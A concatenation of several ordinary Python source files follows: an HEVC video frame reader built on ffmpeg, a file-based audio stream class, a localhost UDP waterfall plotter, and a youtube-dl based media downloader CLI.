raise DataUnreadableError(fn) return json.loads(ffprobe_output) def vidindex(fn, typ): vidindex_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vidindex") vidindex = os.path.join(vidindex_dir, "vidindex") subprocess.check_call(["make"], cwd=vidindex_dir, stdout=open("/dev/null", "w")) with tempfile.NamedTemporaryFile() as prefix_f, \ tempfile.NamedTemporaryFile() as index_f: try: subprocess.check_call([vidindex, typ, fn, prefix_f.name, index_f.name]) except subprocess.CalledProcessError: raise DataUnreadableError("vidindex failed on file %s" % fn) with open(index_f.name, "rb") as f: index = f.read() with open(prefix_f.name, "rb") as f: prefix = f.read() index = np.frombuffer(index, np.uint32).reshape(-1, 2) assert index[-1, 0] == 0xFFFFFFFF assert index[-1, 1] == os.path.getsize(fn) return index, prefix def cache_fn(func): @wraps(func) def cache_inner(fn, *args, **kwargs): if kwargs.pop('no_cache', None): cache_path = None else: cache_prefix = kwargs.pop('cache_prefix', None) cache_path = cache_path_for_file_path(fn, cache_prefix) if cache_path and os.path.exists(cache_path): with open(cache_path, "rb") as cache_file: cache_value = pickle.load(cache_file) else: cache_value = func(fn, *args, **kwargs) if cache_path: with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file: pickle.dump(cache_value, cache_file, -1) return cache_value return cache_inner @cache_fn def index_stream(fn, typ): assert typ in ("hevc", ) with FileReader(fn) as f: assert os.path.exists(f.name), fn index, prefix = vidindex(f.name, typ) probe = ffprobe(f.name, typ) return { 'index': index, 'global_prefix': prefix, 'probe': probe } def index_videos(camera_paths, cache_prefix=None): """Requires that paths in camera_paths are contiguous and of the same type.""" if len(camera_paths) < 1: raise ValueError("must provide at least one video to index") frame_type = fingerprint_video(camera_paths[0]) for fn in camera_paths: index_video(fn, frame_type, cache_prefix) def index_video(fn, frame_type=None, cache_prefix=None): cache_path = cache_path_for_file_path(fn, cache_prefix) if os.path.exists(cache_path): return if frame_type is None: frame_type = fingerprint_video(fn[0]) if frame_type == FrameType.h265_stream: index_stream(fn, "hevc", cache_prefix=cache_prefix) else: raise NotImplementedError("Only h265 supported") def get_video_index(fn, frame_type, cache_prefix=None): cache_path = cache_path_for_file_path(fn, cache_prefix) if not os.path.exists(cache_path): index_video(fn, frame_type, cache_prefix) if not os.path.exists(cache_path): return None with open(cache_path, "rb") as cache_file: return pickle.load(cache_file) def read_file_check_size(f, sz, cookie): buff = bytearray(sz) bytes_read = f.readinto(buff) assert bytes_read == sz, (bytes_read, sz) return buff def rgb24toyuv420(rgb): yuv_from_rgb = np.array([[ 0.299 , 0.587 , 0.114 ], [-0.14714119, -0.28886916, 0.43601035 ], [ 0.61497538, -0.51496512, -0.10001026 ]]) img = np.dot(rgb.reshape(-1, 3), yuv_from_rgb.T).reshape(rgb.shape) y_len = img.shape[0] * img.shape[1] uv_len = y_len / 4 ys = img[:, :, 0] us = (img[::2, ::2, 1] + img[1::2, ::2, 1] + img[::2, 1::2, 1] + img[1::2, 1::2, 1]) / 4 + 128 vs = (img[::2, ::2, 2] + img[1::2, ::2, 2] + img[::2, 1::2, 2] + img[1::2, 1::2, 2]) / 4 + 128 yuv420 = np.empty(y_len + 2 * uv_len, dtype=img.dtype) yuv420[:y_len] = ys.reshape(-1) yuv420[y_len:y_len + uv_len] = us.reshape(-1) yuv420[y_len + uv_len:y_len + 2 * uv_len] = vs.reshape(-1) return yuv420.clip(0, 255).astype('uint8') def decompress_video_data(rawdat, vid_fmt, w, h, pix_fmt): # using a tempfile is much faster than proc.communicate for some reason with tempfile.TemporaryFile() as tmpf: tmpf.write(rawdat) tmpf.seek(0) threads = os.getenv("FFMPEG_THREADS", "0") cuda = os.getenv("FFMPEG_CUDA", "0") == "1" proc = subprocess.Popen( ["ffmpeg", "-threads", threads, "-hwaccel", "none" if not cuda else "cuda", "-c:v", "hevc", "-vsync", "0", "-f", vid_fmt, "-flags2", "showall", "-i", "pipe:0", "-threads", threads, "-f", "rawvideo", "-pix_fmt", pix_fmt, "pipe:1"], stdin=tmpf, stdout=subprocess.PIPE, stderr=open("/dev/null")) # dat = proc.communicate()[0] dat = proc.stdout.read() if proc.wait() != 0: raise DataUnreadableError("ffmpeg failed") if pix_fmt == "rgb24": ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, h, w, 3) elif pix_fmt == "yuv420p": ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, (h*w*3//2)) elif pix_fmt == "yuv444p": ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, 3, h, w) else: raise NotImplementedError return ret class BaseFrameReader: # properties: frame_type, frame_count, w, h def __enter__(self): return self def __exit__(self, *args): self.close() def close(self): pass def get(self, num, count=1, pix_fmt="yuv420p"): raise NotImplementedError def FrameReader(fn, cache_prefix=None, readahead=False, readbehind=False, index_data=None): frame_type = fingerprint_video(fn) if frame_type == FrameType.raw: return RawFrameReader(fn) elif frame_type in (FrameType.h265_stream,): if not index_data: index_data = get_video_index(fn, frame_type, cache_prefix) return StreamFrameReader(fn, frame_type, index_data, readahead=readahead, readbehind=readbehind) else: raise NotImplementedError(frame_type) class RawData: def __init__(self, f): self.f = _io.FileIO(f, 'rb') self.lenn = struct.unpack("I", self.f.read(4))[0] self.count = os.path.getsize(f) / (self.lenn+4) def read(self, i): self.f.seek((self.lenn+4)*i + 4) return self.f.read(self.lenn) class RawFrameReader(BaseFrameReader): def __init__(self, fn): # raw camera self.fn = fn self.frame_type = FrameType.raw self.rawfile = RawData(self.fn) self.frame_count = self.rawfile.count self.w, self.h = 640, 480 def load_and_debayer(self, img): img = np.frombuffer(img, dtype='uint8').reshape(960, 1280) cimg = np.dstack([img[0::2, 1::2], ((img[0::2, 0::2].astype("uint16") + img[1::2, 1::2].astype("uint16")) >> 1).astype("uint8"), img[1::2, 0::2]]) return cimg def get(self, num, count=1, pix_fmt="yuv420p"): assert self.frame_count is not None assert num+count <= self.frame_count if pix_fmt not in ("yuv420p", "rgb24"): raise ValueError("Unsupported pixel format %r" % pix_fmt) app = [] for i in range(num, num+count): dat = self.rawfile.read(i) rgb_dat = self.load_and_debayer(dat) if pix_fmt == "rgb24": app.append(rgb_dat) elif pix_fmt == "yuv420p": app.append(rgb24toyuv420(rgb_dat)) else: raise NotImplementedError return app class VideoStreamDecompressor: def __init__(self, vid_fmt, w, h, pix_fmt): self.vid_fmt = vid_fmt self.w = w self.h = h self.pix_fmt = pix_fmt if pix_fmt == "yuv420p": self.out_size = w*h*3//2 # yuv420p elif pix_fmt in ("rgb24", "yuv444p"): self.out_size = w*h*3 else: raise NotImplementedError self.out_q = queue.Queue() threads = os.getenv("FFMPEG_THREADS", "0") cuda = os.getenv("FFMPEG_CUDA", "0") == "1" self.proc = subprocess.Popen( ["ffmpeg", "-threads", threads, "-hwaccel", "none" if not cuda else "cuda", "-c:v", "hevc", # "-avioflags", "direct", "-analyzeduration", "0", "-probesize", "32", "-flush_packets", "0", # "-fflags", "nobuffer", "-vsync", "0", "-f", vid_fmt, "-i", "pipe:0", "-threads", threads, "-f", "rawvideo", "-pix_fmt", pix_fmt, "pipe:1"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=open("/dev/null", "wb")) def read_thread(): while True: r = self.proc.stdout.read(self.out_size) if len(r) == 0: break assert len(r) == self.out_size self.out_q.put(r) self.t = threading.Thread(target=read_thread) self.t.daemon = True self.t.start() def __enter__(self): return self def __exit__(self, *args): self.close() def write(self, rawdat): self.proc.stdin.write(rawdat) self.proc.stdin.flush() def read(self): dat = self.out_q.get(block=True) if self.pix_fmt == "rgb24": ret = np.frombuffer(dat, dtype=np.uint8).reshape((self.h, self.w, 3)) elif self.pix_fmt == "yuv420p": ret = np.frombuffer(dat, dtype=np.uint8) elif self.pix_fmt == "yuv444p": ret = np.frombuffer(dat, dtype=np.uint8).reshape((3, self.h, self.w)) else: assert False return ret def eos(self): self.proc.stdin.close() def close(self): self.proc.stdin.close() self.t.join() self.proc.wait() assert self.proc.wait() == 0 class StreamGOPReader(GOPReader): def __init__(self, fn, frame_type, index_data): assert frame_type == FrameType.h265_stream self.fn = fn self.frame_type = frame_type self.frame_count = None self.w, self.h = None, None self.prefix = None self.index = None self.index = index_data['index'] self.prefix = index_data['global_prefix'] probe = index_data['probe'] self.prefix_frame_data = None self.num_prefix_frames = 0 self.vid_fmt = "hevc" i = 0 while i < self.index.shape[0] and self.index[i, 0] != HEVC_SLICE_I: i += 1 self.first_iframe = i assert self.first_iframe == 0 self.frame_count = len(self.index) - 1 self.w = probe['streams'][0]['width'] self.h = probe['streams'][0]['height'] def _lookup_gop(self, num): frame_b = num while frame_b > 0 and self.index[frame_b, 0] != HEVC_SLICE_I: frame_b -= 1 frame_e = num + 1 while frame_e < (len(self.index) - 1) and self.index[frame_e, 0] != HEVC_SLICE_I: frame_e += 1 offset_b = self.index[frame_b, 1] offset_e = self.index[frame_e, 1] return (frame_b, frame_e, offset_b, offset_e) def get_gop(self, num): frame_b, frame_e, offset_b, offset_e = self._lookup_gop(num) assert frame_b <= num < frame_e num_frames = frame_e - frame_b with FileReader(self.fn) as f: f.seek(offset_b) rawdat = f.read(offset_e - offset_b) if num < self.first_iframe: assert self.prefix_frame_data rawdat = self.prefix_frame_data + rawdat rawdat = self.prefix + rawdat skip_frames = 0 if num < self.first_iframe: skip_frames = self.num_prefix_frames return frame_b, num_frames, skip_frames, rawdat class GOPFrameReader(BaseFrameReader): #FrameReader with caching and readahead for formats that are group-of-picture based def __init__(self, readahead=False, readbehind=False): self.open_ = True self.readahead = readahead self.readbehind = readbehind self.frame_cache = LRU(64) if self.readahead: self.cache_lock = threading.RLock() self.readahead_last = None self.readahead_len = 30 self.readahead_c = threading.Condition() self.readahead_thread = threading.Thread(target=self._readahead_thread) self.readahead_thread.daemon = True self.readahead_thread.start() else: self.cache_lock = DoNothingContextManager() def close(self): if not self.open_: return self.open_ = False if self.readahead: self.readahead_c.acquire() self.readahead_c.notify() self.readahead_c.release() self.readahead_thread.join() def _readahead_thread(self): while True: self.readahead_c.acquire() try: if not self.open_: break self.readahead_c.wait() finally: self.readahead_c.release() if not self.open_: break assert self.readahead_last num, pix_fmt = self.readahead_last if self.readbehind: for k in range(num - 1, max(0, num - self.readahead_len), -1): self._get_one(k, pix_fmt) else: for k in range(num, min(self.frame_count, num + self.readahead_len)): self._get_one(k, pix_fmt) def _get_one(self, num, pix_fmt): assert num < self.frame_count if (num, pix_fmt) in self.frame_cache: return self.frame_cache[(num, pix_fmt)] with self.cache_lock: if (num, pix_fmt) in self.frame_cache: return self.frame_cache[(num, pix_fmt)] frame_b, num_frames, skip_frames, rawdat = self.get_gop(num) ret = decompress_video_data(rawdat, self.vid_fmt, self.w, self.h, pix_fmt) ret = ret[skip_frames:] assert ret.shape[0] == num_frames for i in range(ret.shape[0]): self.frame_cache[(frame_b+i, pix_fmt)] = ret[i] return self.frame_cache[(num, pix_fmt)] def get(self, num, count=1, pix_fmt="yuv420p"): assert self.frame_count is not None if num + count > self.frame_count: raise ValueError("{} > {}".format(num + count, self.frame_count)) if pix_fmt not in ("yuv420p", "rgb24", "yuv444p"): raise ValueError("Unsupported pixel format %r" % pix_fmt) ret = [self._get_one(num + i, pix_fmt) for i in range(count)] if self.readahead: self.readahead_last = (num+count, pix_fmt) self.readahead_c.acquire() self.readahead_c.notify() self.readahead_c.release() return ret class StreamFrameReader(StreamGOPReader, GOPFrameReader): def __init__(self, fn, frame_type, index_data, readahead=False, readbehind=False): StreamGOPReader.__init__(self, fn, frame_type, index_data) GOPFrameReader.__init__(self, readahead, readbehind) def GOPFrameIterator(gop_reader, pix_fmt): # this is really ugly. ill think about how to refactor it when i can think good IN_FLIGHT_GOPS = 6 # should be enough that the stream decompressor starts returning data with VideoStreamDecompressor(gop_reader.vid_fmt, gop_reader.w, gop_reader.h, pix_fmt) as dec: read_work = [] def readthing(): # print read_work, dec.out_q.qsize() outf = dec.read() read_thing = read_work[0] if read_thing[0] > 0: read_thing[0] -= 1 else: assert read_thing[1] > 0 yield outf read_thing[1] -= 1 if read_thing[1] == 0: read_work.pop(0) i = 0 while i < gop_reader.frame_count: frame_b, num_frames, skip_frames, gop_data = gop_reader.get_gop(i) dec.write(gop_data) i += num_frames read_work.append([skip_frames, num_frames]) while len(read_work) >= IN_FLIGHT_GOPS: for v in readthing(): yield v dec.eos() while read_work: for v in readthing(): yield v def FrameIterator(fn, pix_fmt, **kwargs): fr = FrameReader(fn, **kwargs) if isinstance(fr, GOPReader): for v in GOPFrameIterator(fr, pix_fmt): yield v else: for i in range(fr.frame_count): yield fr.get(i, pix_fmt=pix_fmt)[0]
input_file_stream.py
"""Load an audio file into memory and play its contents. NumPy and the soundfile module (https://PySoundFile.readthedocs.io/) must be installed for this to work. This example program loads the whole file into memory before starting playback. To play very long files, you should use play_long_file.py instead. """ import sounddevice as sd import soundfile as sf import numpy as np import time import utils.helpers as utils from typing import Callable, Optional from threading import Thread, Event from utils.circular_buffer import CircularBuffer # TODO: handle wrapping of file class InputFileStream(object): def __init__(self, filename, block_size=512, callback: Callable = utils.empty_func): self.filename = filename self.block_size = block_size self.callback = callback self.file = sf.SoundFile(filename) self.sample_rate = self.file.samplerate self.channels = self.file.channels self.latency = self.block_size / self.sample_rate self.start_event = Event() self.blocks_received = 0 self._stop = False def start(self): self._stop = False self.start_event.clear() self.thread = Thread(target=self._stream_file) self.thread.start() print("WAITING") self.start_event.wait() def stop(self): self._stop = True def abort(self): self._stop = True def _stream_file(self): """THREAD: Imitates real time audio stream but from file""" time_per_loop = (self.block_size / self.sample_rate) extra_time_slept = 0 while not self._stop: start = time.perf_counter() # process the audio block = self.file.read(frames=self.block_size, dtype='float32') num_frames = np.shape(block)[0] # handle mono if block.ndim == 1: block = np.expand_dims(block, axis=1) # handle end of file if num_frames < self.block_size: new_block = np.zeros((self.block_size, block.shape[1]), dtype=np.float32) new_block[:num_frames] = block block = new_block self.file.seek(0) self.blocks_received += num_frames self.callback(block, num_frames) # compute processing time end_compute = time.perf_counter() elapsed_compute = end_compute - start # print(f"input process time: {elapsed_compute}") # sleep for remaining time at given sample rate sleep_time = time_per_loop - elapsed_compute - extra_time_slept # print(f"Sleep time: {sleep_time}") time.sleep(max(0, sleep_time)) # signal first block done if self.blocks_received <= self.block_size and self.blocks_received > 0: self.start_event.set() # record any excess time spent sleeping to remove in the next loop end_sleep = time.perf_counter() elapsed_sleep = end_sleep - end_compute extra_time_slept = elapsed_sleep - sleep_time
pyPeekUDP.py
# === Start Python 2/3 compatibility from __future__ import absolute_import, division, print_function, unicode_literals from future.builtins import * # noqa pylint: disable=W0401, W0614 from future.builtins.disabled import * # noqa pylint: disable=W0401, W0614 # === End Python 2/3 compatibility from future import standard_library standard_library.install_aliases() import time import threading import socket import numpy as np import matplotlib.pyplot as plt import matplotlib.animation as animation UDP_IP = "127.0.0.1" UDP_PORT = 2054 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind((UDP_IP, UDP_PORT)) length = 1024 freqs = 1024 times = 128 integration = 128 waterfall = np.zeros((freqs // 4, times), dtype=np.float32) """ idx=0 while True: idx=(idx+1)%times print(idx) for i in np.arange(integration): data, addr = sock.recvfrom(length) d=np.fromstring(data,dtype=np.int8) waterfall[:,idx]+=d """ def updatefig(*args): global waterfall p.set_data(waterfall) return (p,) def data_listener(): idx = 0 debuf = False while True: idx = (idx + 1) % times for i in np.arange(integration): data, addr = sock.recvfrom(length) d = np.fromstring(data, dtype=np.int8) waterfall[:, idx] += d.reshape(-1, 4).mean(axis=1) thread = threading.Thread(target=data_listener) thread.daemon = True thread.start() f, ax = plt.subplots() plt.ioff() p = ax.imshow(waterfall, aspect="auto", animated=True) ani = animation.FuncAnimation(f, updatefig, frames=100, interval=100) f.show()
downloader.py
#!/usr/bin/python3 # Updated On 22/08/2021 # Created By ybenel """ Important Notes: External Downloader And its args do only work in specific video formats In platforms like (youtube) Unfortunately It doesn't work on PH And Other Sites. """ from __future__ import unicode_literals from .banner import * import os,sys,json,itertools,threading,shutil,configparser,optparse from time import sleep as sl from random import shuffle,randint from .colors import get_colors from distutils import util,spawn try: import validators as valid import youtube_dl as dl import requests as req if spawn.find_executable('ffmpeg'): pass else: print("[!] 'ffmpeg' Is Required ! ");sys.exit(0) except ImportError: print("[!] Modules ['requests','youtube_dl','validators'] Are Not Installed ! ") print("[+] Install Them To Get This Tool To Work ") sys.exit(0) # global platform = sys.platform user = os.environ.get('USER') default_conf = [] directory = [] titlez = [] playlist_link = [] extension = [] cf_path = ("/home/%s/.config/PrNdOwN/"%(user)) # Config Parser class config_reader(): def find_config(filename='config.rc'): if platform in ['win64','win32'] and os.path.isfile(filename) == True: config_reader.read_config(filename) elif platform == 'linux': if os.path.isfile(filename) == True: config_reader.read_config(filename) elif os.path.isfile('%s%s'%(cf_path,filename)) == True: config_reader.read_config(('%s%s'%(cf_path,filename))) else: print("[!] Config Not Found !");exit(1) else: config_reader.read_config(filename) def read_config(filename): try: config = configparser.ConfigParser() config.read(filename) prev_loc = config['DEFAULT']['Prevered_location'] vid_qual = config['DEFAULT']['Video_quality'] vid_qual2 = vid_qual sound_qual = config['DEFAULT']['Sound_quality'] extr = config['DEFAULT']['Extract_audio'] qta = config['DEFAULT']['Quiet'] Playlist = config['DEFAULT']['Playlist'] aria2c = config['DEFAULT']['Aria2c'] external = config['DEFAULT']['External'] external_args = config['DEFAULT']['External_args'] proxy = config['DEFAULT']['Proxy'] geobypass = config['DEFAULT']['Geobypass'] vid_Aud = config['DEFAULT']['Formats'];vid_Aud = list(vid_Aud.split(" ")) Aud_bit = config['DEFAULT']['Audio_Bit'] thumbnail = config['DEFAULT']['Thumbnail'] sound_qual = bool(util.strtobool(sound_qual)) extr = bool(util.strtobool(extr)) qta = bool(util.strtobool(qta)) Playlist = bool(util.strtobool(Playlist)) aria2c = bool(util.strtobool(aria2c)) geoby = bool(util.strtobool(geobypass)) default_conf.extend([prev_loc,vid_qual,vid_qual2,sound_qual,extr,qta,Playlist,aria2c,external,external_args,proxy,vid_Aud,Aud_bit,geoby,thumbnail]) except KeyError: return # Parser All Arguments To Config Then Download class parser_args(): def __init__(self,*args): self.type = args[0] self.link = args[1] self.format = args[2] self.audio_format = args[3] or 'mp3' self.video_format = args[4] or 'mp4' self.video_bitrate = args[5] or '320' self.playlist = args[6] or False self.external_downloader = args[7] self.external_downloader_args = args[8] self.username = args[9] or '' self.password = args[10] or '' self.twofactor = args[11] or '' self.videopassword = args[12] or '' self.proxy = args[13] or '' self.geobypass = args[14] or False self.thumbnail = args[15] or False def add_values(self): config = download.get_config() incase_of_error = {'Type': self.type,'AFormat': self.audio_format,'VFormat': self.video_format,'VBitrate': self.video_bitrate,'Playlist': self.playlist,'SExternal': self.external_downloader,'SExternalD': self.external_downloader_args,'User': self.username,'Pass': self.password,'TFactor': self.twofactor, 'VPass': self.videopassword, 'Proxy': self.proxy, 'GeoBy': self.geobypass} config[self.type]['format'] = self.format if self.type == "Audio": for x in config[self.type]['postprocessors']: x['preferredcodec'] = self.audio_format;x['preferredquality'] = self.video_bitrate break config[self.type]['preferedformat'] = self.video_format if self.playlist == "True": config[self.type]['noplaylist'] = False if self.thumbnail == "False": config[self.type]['writethumbnail'] = False if str(self.external_downloader) != "None": config[self.type]['external_downloader'] = self.external_downloader if str(self.external_downloader_args) != "None": config[self.type]['external_downloader_args'] = self.external_downloader_args if self.username != '': config[self.type]['username'] = self.username if self.password != '': config[self.type]['password'] = self.password if self.twofactor != '': config[self.type]['twofactor'] = self.twofactor if self.videopassword != '': config[self.type]['videopassword'] = self.videopassword if self.proxy != '': config[self.type]['proxy'] = self.proxy if str(self.geobypass) != "None": config[self.type]['geo_bypass'] = self.geobypass download.download(self.link, config[self.type],incase_of_error) download.output_file(directory[0],titlez[0]) class download(): # Some Global Variables And lists global recog com_reso = [] # Clear The Screen def clear(): if sys.platform in ['win64','win32']: os.system('cls') else: os.system('clear') # Check if the link is alive def check_url(url): try: req.get(url) except req.exceptions.ConnectionError: print("[!] Please check your network connection.") return False except req.exceptions.Timeout: print("[!] Site is taking too long to load, TimeOut.") return False except req.exceptions.TooManyRedirects: print("[!] Too Many Redirects") return False except req.exceptions.RequestException as ex: print("[!] " + ex) sys.exit(0) return True # Check if my net is alive def check_connection(link): try: req.get(link) return True except req.exceptions.ConnectionError: print("[!] Please check your network connection.") return False except req.exceptions.HTTPError as error: print("[!] " + error) sys.exit(0) # Animation def animation(timing='1234',begin=True): done = begin # for c in itertools.cycle(['|', '/', '-', '\\']): for c in range(1,10): if done: break sys.stdout.write('\rTime Is ' + str(c) + timing) sys.stdout.flush() sl(0.1) sys.stdout.write('\rDone! ') done = True # get the current directory def get_current_dir(filename,dir): conv = filename.endswith(".webm") exts = extension[0] if dir is None: if conv: filename = filename.split(".w")[0]+f".{exts}" print() print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize2() + " Converting Sample From [webm] Format") print() print(get_colors.randomize() + "["+get_colors.randomize2()+"+"+get_colors.randomize1()+"]" + get_colors.randomize2() + " This Might Take Few Seconds/Minutes") if os.path.isfile(filename): print() print('\n' + get_colors.green() + '[' + get_colors.magento() + '+' + get_colors.green() + ']' + get_colors.randomize2() + " Video Saved Undername "+ get_colors.randomize3() + f"['{filename}']" + get_colors.white() + '\n') print(get_colors.green() + '[' + get_colors.magento() + '+' + get_colors.green() + ']' + get_colors.white() + ' Folder ' + get_colors.randomize() + os.getcwd()) print() else: if conv: filename = filename.split(".w")[0]+f".{exts}" print() print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize2() + " Converting Sample From [webm] Format") print() print(get_colors.randomize() + "["+get_colors.randomize2()+"+"+get_colors.randomize1()+"]" + get_colors.randomize2() + " This Might Take Few Seconds/Minutes") if os.path.isfile(filename): print() print('\n' + get_colors.green() + '[' + get_colors.magento() + '+' + get_colors.green() + ']' + get_colors.randomize2() + " Video Saved Undername "+ get_colors.randomize3() + f"['{filename}']" + get_colors.white() + '\n') print(get_colors.green() + '[' + get_colors.magento() + '+' + get_colors.green() + ']' + get_colors.white() + ' Folder ' + get_colors.randomize() + dir) print() # Get Downloading Status def hooker(t): if t['status'] == 'downloading': sys.stdout.flush() sys.stdout.write('\r' + get_colors.red() +'[' + get_colors.cyan() +'+' + get_colors.red() + ']' + get_colors.randomize1() + ' Progress ' + get_colors.randomize() + str(t['_percent_str'])) sl(0.1) elif t['status'] == 'finished': try: dict = directory[0] except: dict = None download.get_current_dir(t['filename'],dict) # List All Available Resolutions def user_resolution(): available = ['4k','2k','1080p','720p','480p','360p'] return available # Download Configurations def get_config(): config = { 'Audio': { 'quiet': True, 'outtmpl': "%(title)s.%(ext)s", 'writethumbnail': True, 'progress_hooks': [download.hooker], 'postprocessors': [{ 'key': 'FFmpegExtractAudio', 'preferredcodec': 'mp3', 'preferredquality': '320'}, {'key': 'EmbedThumbnail'}, {'key': 'FFmpegMetadata'},] }, 'Video': { 'quiet': True, 'outtmpl': "%(title)s.%(ext)s", 'noplaylist': True, 'no_warnings': True, 'ignoreerrors': True, 'progress_hooks': [download.hooker], 'postprocessors': [{ 'key': 'FFmpegVideoConvertor', 'preferedformat': 'mp4', }] }, 'list': { 'listsubtitles': True }, 'listformat': { 'lisformats': True } } return config def download(link, data, err): try: with dl.YoutubeDL(data) as ydl: ydl.download([link]) except dl.utils.ExtractorError: print("[!] Exception Occurred While Extracting File ...") exit(1) except dl.utils.UnsupportedError: print("[!] URL Is Not Supported") exit(1) except dl.utils.GeoRestrictedError: print("[!] Video/Audio Is Restricted In Ur Area\n[+] Consider Using [--bypass-geo]") exit(1) except dl.utils.UnavailableVideoError: print("[!] Video/Audio You Requested Is Not Available") except dl.utils.DownloadError as e: if "Unable to login: Invalid username/password!" in str(e): print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize3() + " Can't Login Invalid Username/Password") if "requested format not available" in str(e): print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize3() + " An Error Occurred While Trying Downloading") print(get_colors.randomize() + "["+get_colors.randomize2()+"+"+get_colors.randomize1()+"]" + get_colors.randomize3() + " Trying Automatic Way To Fix The Error") err = err; s = parser_args(err['Type'],link,'bestvideo+bestaudio/best',err['AFormat'],err['VFormat'],err['VBitrate'],err['Playlist'],err['SExternal'],err['SExternalD'],err['User'],err['Pass'],err['TFactor'],err['VPass'],err['Proxy'],err['GeoBy']) s.add_values() # Scrape Link Info ['metadata','thumbnail','uploader'....] def get_info(link): ydl2 = dl.YoutubeDL({'quiet':True,'no_warnings': True,'ignoreerrors': False}) try: result = ydl2.extract_info(link,download=False) except dl.utils.DownloadError: exit(1) if 'entries' in result: video = result['entries'][0] else: video = result video_title = video['title'] max_reso = video['format_id'] if 'duration' in result: video_size = result['duration'] else: video_size=None # video_url = video['url'] return video_title,video_size,max_reso,result # Let's see how lucky you are def buggy(): nums = [1,2,3,4,5,6,7,8,9,10] shuffle(nums) if nums == 7: x = threading.Thread(target=banner3) x.start() download.clear() buggy() print() else: banner4() print() # URL recognition (Youtube,PH etc) def url_recognition(link): if "youtube" in link: download.recog = True else: download.recog = False # Video metadata def print_metadata(): print(get_colors.cyan() + "[" + get_colors.magento() + '0' + get_colors.cyan() + "] " + get_colors.randomize2() + "Download an Audio playlist") print(get_colors.cyan() + "[" + get_colors.magento() + '1' + get_colors.cyan() + "] " + get_colors.randomize2() + "Download a Video playlist") print(get_colors.cyan() + "[" + get_colors.magento() + '2' + get_colors.cyan() + "] " + get_colors.randomize2() + "Download a Single Audio") print(get_colors.cyan() + "[" + get_colors.magento() + '3' + get_colors.cyan() + "] " + get_colors.randomize2() + "Download a single video file") print() # Video Metadata 2 def print_metadata2(title,duration,resolution): print(get_colors.randomize() + "Title Video: " +get_colors.randomize1()+ f"{title} " + get_colors.randomize() + "Duration: " + get_colors.green() + f"{duration}" + get_colors.randomize() + " Highest Resolution: " + get_colors.cyan() + f"{resolution}") print() # User Input def user_input(option=0): if option==0: link = input(get_colors.randomize2() + "["+get_colors.randomize3()+"*"+get_colors.randomize1()+"]" + get_colors.randomize2() + " Enter the link: " + get_colors.randomize() + get_colors.white()) return link elif option==1: try: metadata_inp = int(input(get_colors.randomize2() + "["+get_colors.randomize2()+"------------Enter your choice------------"+get_colors.randomize2()+"]: ")) return metadata_inp except ValueError: user_input(option=1) elif option==2: try: reso_inp = int(input(get_colors.randomize2() + "["+get_colors.randomize2()+"------------Enter your choice------------"+get_colors.randomize2()+"]: ")) return reso_inp except ValueError: user_input(option=2) elif option==3: con_inp = str(input(get_colors.white() + "[*] Do You Want To Continue? (Y/n): ")) return con_inp else: return # Print More Stuff def user_print(option=0): if option==0: print(get_colors.randomize() + "Unknown Choice :(") elif option==1: print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize3() + " Unvalid Url!!!" + get_colors.randomize2()) print(get_colors.randomize() + "["+get_colors.randomize1()+"!"+get_colors.randomize2()+"]" + get_colors.randomize2() + " Please Try Again" + get_colors.randomize3()) elif option==2: resolutions = download.user_resolution() print(get_colors.randomize() + "[+] Please Select Your Prefered Resolution\n") for i in range(0,6): print(get_colors.cyan() + "[" + get_colors.magento() + str(i) + get_colors.cyan() + "] " + get_colors.randomize2() + resolutions[i]) print() elif option==3: print(get_colors.randomize2() + "DownloadError Occurred !!!") print(get_colors.randomize1() + "Re Run The Script With The Same URL And The Same Options To Continue Downloading!") elif option==4: print(get_colors.randomize1() + "Your Choice Is Out Of Range !") else: return # Shortcuts def clear_pr(): download.clear() download.buggy() # Type Of Download def type_down(metadata_inp,link): config = download.get_config() if metadata_inp in [1,3]: download.user_print(option=2) reso_inp = download.user_input(option=2) if str(reso_inp) == '0': reso_inp = '4k' if str(reso_inp) == '1': reso_inp = '2k' if str(reso_inp) == '2': reso_inp = '1080p' if str(reso_inp) == '3': reso_inp = '720p' if str(reso_inp) == '4': reso_inp = '480p' if str(reso_inp) == '5': reso_inp = '360p' if metadata_inp == 1: download.get_me_my_stuff(link,None,reso_inp,0,False,False,False,False,None,None,None,None,None,None,None,None,'mp4',None,False) else: download.get_me_my_stuff(link,None,reso_inp,0,True,False,False,False,None,None,None,None,None,None,None,None,'mp4',None,False) if metadata_inp in [0,2]: if metadata_inp == 0: download.get_me_my_stuff(link,None,None,0,False,True,False,False,None,None,'320',None,None,None,None,None,None,'mp3',False) else: download.get_me_my_stuff(link,None,None,0,True,True,False,False,None,None,'320',None,None,None,None,None,None,'mp3',False) else: download.user_print(option=0) # all out def get_over(link): title, duration,reso,result = download.get_info(link) if duration is not None: duration = int(duration) duration = m,s = divmod(duration,60) duration = h,m = divmod(duration[0], 60) duration = (f'{h:d}:{m:02d}:{s:02d}') else: duration = None download.com_reso.append(reso); return title,duration,reso # BannerAndClear def bncl(): download.clear() banner() # The Holy Engine Of Look def run(): download.bncl() while True: try: if download.check_url("https://google.com"): link = download.user_input(option=0) if not valid.url(link): download.user_print(option=1) exit(1) if download.check_connection(link): download.bncl() download.print_metadata() metadata_inp = download.user_input(option=1) download.type_down(metadata_inp,link) con_inp = download.user_input(option=3) if con_inp in ['Y','y']: download.bncl() continue elif con_inp in ['N', 'n']: print("\n[+] Cya Next Time") exit(1) else: download.user_print(option=0) continue except dl.utils.DownloadError: download.bncl() print(get_colors.randomize2() + "DownloadError Occurred !!!") print(get_colors.randomize1() + "Re Run The Script With The Same URL And The Same Options To Continue Downloading!") exit(1) # Command Arguments def command_line(): usage = "Usage: PrNdOwN [options] url" parser = optparse.OptionParser(usage) 